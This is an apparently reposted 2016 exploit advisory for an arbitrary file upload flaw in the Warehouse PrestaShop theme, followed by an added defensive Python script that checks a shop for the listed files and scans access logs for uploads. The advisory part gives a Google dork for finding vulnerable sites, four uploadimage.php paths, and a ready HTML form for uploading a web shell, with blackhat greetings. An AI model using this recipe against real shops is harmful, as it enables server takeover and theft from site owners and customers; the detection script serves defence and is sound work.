Sunday, February 5, 2017
Warehouse Responsive Prestashop 1 6 Arbitrary File Upload
#- Title: Joomla Warehouse - Responsive Prestashop 1.6 Arbitrary File Upload
#- Author: people_hurt
#- Published : 21/06/2016
#- Developer : iqit-commerce
#- Link Download : themeforest .net/item/warehouse-responsive-prestashop-16-theme-blog/3178575
#- Google Dork: inurl:"/modules/productpageadverts/"
#- Fixed in Version : -
#- Tested on : windows
=======================================================
-- Proof Of Concept --
Description :
Warehouse is a clean, powerful HTML5 responsive PrestaShop theme.
Warehouse utilizes many advanced modules and modifications like (rollover images, clean cart, sliders, autocomplete, dialogs). The theme is SEO friendly and cross-browser compatible; it is based on the PrestaShop 1.6 default Bootstrap theme.
Vulnerability :
site /modules/columnadverts/uploadimage.php
site /modules/homepageadvertise/uploadimage.php
site /modules/productpageadverts/uploadimage.php
site /modules/simpleslideshow/uploadimage.php
CSRF
<form method="POST" action="http://website/modules/module name/uploadimage.php"
enctype="multipart/form-data">
<input type="file" name="userfile" /><button>Upload</button>
</form>
If successful > shell.xxx
Shell access? Click here
by people_hurt
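For shop owners, an added example (not part of the original advisory) that checks a PrestaShop install for the four uploadimage.php files listed above and flags POST requests to them in a web access log. The combined log format, the function names and the sample log lines are assumptions made for this example.

```python
import re
from pathlib import Path
from urllib.parse import unquote

# Module directories named in the advisory above.
MODULES = ("columnadverts", "homepageadvertise", "productpageadverts", "simpleslideshow")
ENDPOINT = re.compile(
    r"/modules/+(%s)/+uploadimage\.php(?:[/?#]|$)" % "|".join(MODULES), re.IGNORECASE)
# Assumed format: ip - user [time] "METHOD path proto" status size ...
LOG_LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+)[^"]*" (?P<status>\d{3}) ')

def exposed_endpoints(shop_root):
    """Return the advisory's uploadimage.php files that exist under shop_root."""
    root = Path(shop_root)
    return [p.relative_to(root).as_posix() for m in MODULES
            if (p := root / "modules" / m / "uploadimage.php").is_file()]

def upload_hits(lines):
    """Yield (ip, time, module, status) for each POST to a listed endpoint."""
    for line in lines:
        m = LOG_LINE.match(line)
        if not m or m["method"] != "POST":
            continue
        # Decode percent-encoding so an encoded path still matches.
        hit = ENDPOINT.search(unquote(m["path"]))
        if hit:
            yield m["ip"], m["time"], hit[1].lower(), int(m["status"])

# Constructed sample lines (not real traffic; documentation-range addresses).
SAMPLE_LOG = [
    '203.0.113.7 - - [05/Feb/2017:10:12:01 +0000] "POST /modules/columnadverts/uploadimage.php HTTP/1.1" 200 31 "-" "curl/7.50"',
    '198.51.100.4 - - [05/Feb/2017:10:12:09 +0000] "GET /modules/simpleslideshow/uploadimage.php HTTP/1.1" 200 0 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [05/Feb/2017:10:13:40 +0000] "POST /shop/modules/ProductPageAdverts/uploadimage.php?x=1 HTTP/1.1" 404 162 "-" "curl/7.50"',
    '192.0.2.15 - - [05/Feb/2017:10:14:02 +0000] "POST /modules/blockcart/ajax.php HTTP/1.1" 200 88 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for ip, when, module, status in upload_hits(SAMPLE_LOG):
        print(f"{when} {ip} POST {module}/uploadimage.php -> {status}")
```

Any file reported by exposed_endpoints() is a candidate for removal or access restriction, and a 200 response in upload_hits() is a reason to inspect the module's upload directory for files that are not images.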
Greetzzzz : jatim blackhat - surabaya hackerlink - surabaya blackhat and you